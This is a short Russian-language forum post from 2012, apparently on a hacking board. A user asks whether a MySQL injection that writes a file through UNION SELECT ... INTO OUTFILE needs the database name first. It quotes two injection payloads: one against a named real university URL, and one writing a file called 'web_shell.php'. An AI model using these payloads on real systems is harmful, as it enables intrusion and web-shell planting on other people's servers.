23.06.2012, 16:24
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Спасибо t3cHn0iD,Dr.Strangelove!
А чуть не забыл, еще вопрос: в ФАКЕ об заливке через mysql inj, написан вот такой пример:
Сообщение от None
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+null,'text',null,null,null,nu ll+
from+accounts
+into+outfile+'/tmp/aaa.php'/*
Мне не понятно именно этот момент, зачем здесь указывать имя БД? Это вообще обязательно? Вот например SQL inj:
Сообщение от None
site.com/news.php?id=1'+union+select+1,2,'hacked'+into+outf ile+'/tmp/web_shell.php'
Данная конструкция будет работать, или же сначала нужно через information_schema вытащить БД? |
|
|